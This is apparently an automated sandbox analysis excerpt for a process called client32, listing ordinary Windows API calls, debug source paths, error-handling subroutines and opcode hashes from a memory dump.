                                                                              • Source File: 00000003.00000002.2970508337.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: ErrorExitLastMessageProcessShowWindowwsprintf
                                                                              • String ID: e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h$m_hWnd
                                                                              • API String ID: 1604732272-2830328467
                                                                              • Opcode ID: 29a8f3e74b10ecb473689528bebe8d9fb683c07999dd0dfdb1f1582f8126aa29
                                                                              • Instruction ID: 819250d5e51c5ae6cd1eebd62df6884d4c995cad7bb4673794d6e20848bff6e8
                                                                              • Opcode Fuzzy Hash: 29a8f3e74b10ecb473689528bebe8d9fb683c07999dd0dfdb1f1582f8126aa29
                                                                              • Instruction Fuzzy Hash: A0D02BB191032D7BC3048A81DC42ED6F3CCEB04365F004036F62656100D670E440C3D4
                                                                              APIs
                                                                              • KillTimer.USER32(?,?), ref: 1100102B
                                                                                • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
                                                                                • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
                                                                                • Part of subcall function 11029A70: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029B13
                                                                                • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
                                                                              Strings
                                                                              • e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h, xrefs: 11001011
                                                                              • m_hWnd, xrefs: 11001016
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.2970508337.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: ErrorExitKillLastMessageProcessTimerwsprintf
                                                                              • String ID: e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h$m_hWnd
                                                                              • API String ID: 2229609774-2830328467
                                                                              • Opcode ID: 41ac2f8117c1c669daa6b7824a22dc0040faad1d84520ef1f3ec06ac7ff731c9
                                                                              • Instruction ID: 3936fa5a6487bcfb2675ba24450813cfe8c9b001fa673c8171921283ac7246b0
                                                                              • Opcode Fuzzy Hash: 41ac2f8117c1c669daa6b7824a22dc0040faad1d84520ef1f3ec06ac7ff731c9
                                                                              • Instruction Fuzzy Hash: C8D02BB66003287BD320D681DC41ED6F3CCD708354F004036F51956100D5B0E840C390
                                                                              APIs
                                                                              • SendMessageA.USER32(00000000,00001200,00000000,00000000), ref: 1101419A
                                                                                • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
                                                                                • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
                                                                                • Part of subcall function 11029A70: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029B13
                                                                                • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
                                                                              Strings
                                                                              • e:\nsmsrc\nsm\1210\1210f\ctl32\headctrl.h, xrefs: 1101417B
                                                                              • m_hWnd, xrefs: 11014180
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.2970508337.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: Message$ErrorExitLastProcessSendwsprintf
                                                                              • String ID: e:\nsmsrc\nsm\1210\1210f\ctl32\headctrl.h$m_hWnd
                                                                              • API String ID: 819365019-3507600817
                                                                              • Opcode ID: dd98e714131f01e1e3e9502ddc8d4ea3022c80635d59d6fdd5c37ba5f3223207
                                                                              • Instruction ID: 2522c449d059071d808e86b76c7b4b43721457dd443dfec71d59ac38f3b9efb9
                                                                              • Opcode Fuzzy Hash: dd98e714131f01e1e3e9502ddc8d4ea3022c80635d59d6fdd5c37ba5f3223207
                                                                              • Instruction Fuzzy Hash: A0D0A735F9033576E6205591AC4BFC5B2985B04B49F104165F121B90C1D2A0B4408648
                                                                              APIs
                                                                              • FindWindowA.USER32(MSOfficeWClass,00000000), ref: 1111316A
                                                                              • SendMessageA.USER32(00000000,00000414,00000000,00000000), ref: 11113180
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.2970508337.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: FindMessageSendWindow
                                                                              • String ID: MSOfficeWClass
                                                                              • API String ID: 1741975844-970895155
                                                                              • Opcode ID: 677dd944a9b37f0d248d1dc2443b6c9e227fd66e90a00cd9b08d5884c152e529
                                                                              • Instruction ID: 2732a125022ff7c0da3ed2a920369edb2684b905192db69b753ec1fccd0d92f1
                                                                              • Opcode Fuzzy Hash: 677dd944a9b37f0d248d1dc2443b6c9e227fd66e90a00cd9b08d5884c152e529
                                                                              • Instruction Fuzzy Hash: FAD0127078430C77E6141AE1DE4EF96FB6C9744B65F004028F7159E4C5EAB4B44087BC
                                                                              APIs
                                                                              • DestroyWindow.USER32(?,000000A8,110AC717), ref: 1115F338
                                                                                • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
                                                                                • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
                                                                                • Part of subcall function 11029A70: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029B13
                                                                                • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.2970508337.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: DestroyErrorExitLastMessageProcessWindowwsprintf
                                                                              • String ID: ..\ctl32\wndclass.cpp$m_hWnd
                                                                              • API String ID: 1417657345-2201682149
                                                                              • Opcode ID: 040279418c787453246ac35a00e20d52c99efbdfef44f19d6389bd7086f83bc2
                                                                              • Instruction ID: 7db3f745f54082ef040700b2ebbb9d394f22af4f20fbf84319d784bae123f924
                                                                              • Opcode Fuzzy Hash: 040279418c787453246ac35a00e20d52c99efbdfef44f19d6389bd7086f83bc2
                                                                              • Instruction Fuzzy Hash: 9CD0A770A503359BD7608A56EC86BC6F2D4AB1221CF044479E0A362551E270F584C681
                                                                              APIs
                                                                              • ImageList_GetImageCount.COMCTL32 ref: 110161CF
                                                                                • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
                                                                                • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
                                                                                • Part of subcall function 11029A70: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029B13
                                                                                • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
                                                                              Strings
                                                                              • m_hImageList, xrefs: 110161BF
                                                                              • e:\nsmsrc\nsm\1210\1210f\ctl32\imagelst.h, xrefs: 110161BA
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.2970508337.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: Image$CountErrorExitLastList_MessageProcesswsprintf
                                                                              • String ID: e:\nsmsrc\nsm\1210\1210f\ctl32\imagelst.h$m_hImageList
                                                                              • API String ID: 3979668856-4007669474
                                                                              • Opcode ID: 7e0d59d6d3c0ea1f021620d87c473adee649be5d7cc0ac9c58f617f8560ff774
                                                                              • Instruction ID: da6b7ee7688318b2dcaecae8c32772a12d0a8ac3ffe856306cb0240b92e991ba
                                                                              • Opcode Fuzzy Hash: 7e0d59d6d3c0ea1f021620d87c473adee649be5d7cc0ac9c58f617f8560ff774
                                                                              • Instruction Fuzzy Hash: 99D02230E40136ABC3209A94BC02BC9B3886F05208F0C0465F06256040E6B468808A84
                                                                              APIs
                                                                              • SetEvent.KERNEL32(00000000,?,1102CB9F), ref: 111100F4
                                                                                • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
                                                                                • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
                                                                                • Part of subcall function 11029A70: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029B13
                                                                                • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.2970508337.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: ErrorEventExitLastMessageProcesswsprintf
                                                                              • String ID: ..\ctl32\Refcount.cpp$this->hReadyEvent
                                                                              • API String ID: 2400454052-4183089485
                                                                              • Opcode ID: 4b22ea46bdd503ae8f9c5b08486a64ba336daf28115d2eb9ea5a5faf497afeb0
                                                                              • Instruction ID: 41d86d8e6b2fa9399a940e20fae9938a479a885d6893b5e9ee770bdda361f714
                                                                              • Opcode Fuzzy Hash: 4b22ea46bdd503ae8f9c5b08486a64ba336daf28115d2eb9ea5a5faf497afeb0
                                                                              • Instruction Fuzzy Hash: D4D01231E80736AFD7209AE5AC05BD6F3B85B04315F044539F012A6584DAB0A4458BE5
                                                                              APIs
                                                                              • GetMenu.USER32(00000000), ref: 1101D3B4
                                                                                • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
                                                                                • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
                                                                                • Part of subcall function 11029A70: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029B13
                                                                                • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
                                                                              Strings
                                                                              • e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h, xrefs: 1101D39E
                                                                              • m_hWnd, xrefs: 1101D3A3
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.2970508337.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: ErrorExitLastMenuMessageProcesswsprintf
                                                                              • String ID: e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h$m_hWnd
                                                                              • API String ID: 1590435379-2830328467
                                                                              • Opcode ID: 1024b712624d312cdb50eec61baa504417252f83fa22596b784198089b8c0041
                                                                              • Instruction ID: 75955eb5d3bdaa86fb34179760e08c08bc775c18ff6c0b8e66661a9f5e9df206
                                                                              • Opcode Fuzzy Hash: 1024b712624d312cdb50eec61baa504417252f83fa22596b784198089b8c0041
                                                                              • Instruction Fuzzy Hash: 18D022B1D00235ABC700D662EC4ABC9F2C49B09318F004076F03666004E2B4E4808384
                                                                              APIs
                                                                              • GetWindowTextLengthA.USER32(00000000), ref: 11154234
                                                                                • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
                                                                                • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
                                                                                • Part of subcall function 11029A70: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029B13
                                                                                • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
                                                                              Strings
                                                                              • e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h, xrefs: 1115421E
                                                                              • m_hWnd, xrefs: 11154223
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.2970508337.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: ErrorExitLastLengthMessageProcessTextWindowwsprintf
                                                                              • String ID: e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h$m_hWnd
                                                                              • API String ID: 67735064-2830328467
                                                                              • Opcode ID: 1d54aad98bb84251d308c7fdba18d94c17ec73c60877c839a460b4fca593964e
                                                                              • Instruction ID: 19f6c6fa1a7f22991327a281ba6cc225d63cdd76b5fbcf1c4c4c0146bd397b80
                                                                              • Opcode Fuzzy Hash: 1d54aad98bb84251d308c7fdba18d94c17ec73c60877c839a460b4fca593964e
                                                                              • Instruction Fuzzy Hash: DBD022B1A50236ABCB908691FC86BC5F3949B0A308F000436F03262404E2B4A4808391